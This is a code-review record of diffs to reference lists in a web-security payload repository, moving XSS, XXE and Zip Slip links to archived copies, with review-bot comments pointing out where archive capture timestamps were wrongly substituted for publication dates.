- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - September 26, 2014](https://web.archive.org/web/20140926052901/http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
- [Mutation XSS in Google Search - Tomasz Andrzej Nidecki - April 10, 2019](https://web.archive.org/web/20260305093221/https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/)
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013](https://web.archive.org/web/20250901044759/https://cure53.de/fp170.pdf)
- [postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016](https://web.archive.org/web/20231004103135/https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
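Review bot: the HITB slides lose their real date: `May 2012` matched the conference (`hitbsecconf2012ams` in the URL), whereas the new September 26, 2014 is the Wayback capture timestamp (`20140926052901`); revert to May 2012 rather than dating the talk by when it was archived.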

View File

@@ -672,8 +672,8 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
- [How we got read access on Googles production servers - Detectify - April 11, 2014](https://web.archive.org/web/20230902033341/https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/)
- [Impossible XXE in PHP - Aleksandr Zhurnakov - March 11, 2025](https://web.archive.org/web/20260131091306/https://swarm.ptsecurity.com/impossible-xxe-in-php/)
- [Midnight Sun CTF 2019 Quals - Rubenscube - jbz - April 6, 2019](https://web.archive.org/web/20260302041500/https://jbz.team/midnightsunctfquals2019/Rubenscube)
- [OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016](https://web.archive.org/web/20170205151900/https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
- [Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016](https://web.archive.org/web/20181213212434/https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
- [OOB XXE through SAML - Sean Melia (@seanmeals) - February 5, 2017](https://web.archive.org/web/20170205151900/https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
- [Payloads for Cisco and Citrix - Arseniy Sharoglazov - December 13, 2018](https://web.archive.org/web/20181213212434/https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
- [Pentest XXE - @phonexicum - March 9, 2020](https://web.archive.org/web/20260306152955/https://phonexicum.github.io/infosec/xxe.html)
- [Playing with Content-Type XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](https://web.archive.org/web/20240615071332/https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/)
- [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024](https://web.archive.org/web/20240527202144/https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe)
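Review bot: both rewritten dates in this hunk are capture timestamps rather than publication dates: the SAML write-up's URL path `/2016/01/` shows it was published in January 2016, so February 5, 2017 (capture `20170205151900`) is a step backwards, and December 13, 2018 on the mohemiv entry is likewise its capture `20181213212434`; keep the publication date where the URL or the original line gives it and fall back to the archive date only when nothing else is known.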

View File

@@ -44,5 +44,5 @@ For a list of affected libraries and projects, visit [snyk/zip-slip-vulnerabilit
## References
* [Zip Slip - Snyk - June 5, 2018](https://github.com/snyk/zip-slip-vulnerability)
* [Zip Slip - Snyk - June 5, 2018](https://web.archive.org/web/20260307012319/https://github.com/snyk/zip-slip-vulnerability)
* [Zip Slip Vulnerability - Snyk - April 15, 2018](https://web.archive.org/web/20180605125813/https://snyk.io/research/zip-slip-vulnerability)

View File

@@ -36,4 +36,4 @@ Exploit
## References
* [Blog title - Author (@handle) - Month XX, 202X](https://web.archive.org/web/20020120142510/http://example.com:80/)
* [Blog title - Author (@handle) - January 1, 2024](https://web.archive.org/web/20020120142510/http://example.com:80/)
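Review bot: this is the README template (`Blog title - Author (@handle)`), so replacing `Month XX, 202X` with a concrete `January 1, 2024` turns an obvious placeholder into a plausible-looking date that will get copied into new pages unchanged; keep a placeholder in the target format instead, for example `Month D, YYYY`, so the field is clearly meant to be filled in.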